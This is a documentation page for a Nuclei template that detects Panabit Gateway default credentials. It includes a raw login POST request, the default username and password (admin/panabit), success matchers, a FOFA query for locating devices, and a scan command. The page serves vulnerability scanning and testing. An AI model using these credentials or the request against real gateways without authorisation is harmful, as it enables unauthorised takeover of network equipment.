Panabit Gateway - Default Login
ID: panabit-default-login
Severity: critical
Author: pikpikcu,ritikchaddha
Tags: panabit,default-login,intrusive
Description
Section titled “Description”Panabit Gateway default credentials were discovered.
YAML Source
Section titled “YAML Source”id: panabit-default-login
info: name: Panabit Gateway - Default Login author: pikpikcu,ritikchaddha severity: critical description: Panabit Gateway default credentials were discovered. reference: - https://max.book118.com/html/2017/0623/117514590.shtm - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-1391 metadata: verified: true max-request: 1 fofa-query: app="Panabit-智能网关" tags: panabit,default-login,intrusive
http: - raw: - | POST /login/userverify.cgi HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC Referer: {{BaseURL}}/login/login.htm Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundaryAjZMsILtbrBp8VbC Content-Disposition: form-data; name="username"
{{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC Content-Disposition: form-data; name="password"
{{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
payloads: username: - admin password: - panabit attack: pitchfork
matchers-condition: and matchers: - type: word part: body words: - '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">' - 'urn:schemas-microsoft-com:vml' condition: and
- type: word part: header words: - "paonline_admin"
- type: status status: - 200# digest: 4b0a00483046022100f0fb3fbe346ad291c803d2012289ef11ac5b5803c7b1dfba7459e5d62a4ae80f022100bf3c976c15715896960e98497b95e025e915b0bc48db36ceaf985bc90daef3a3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/panabit/panabit-default-login.yaml"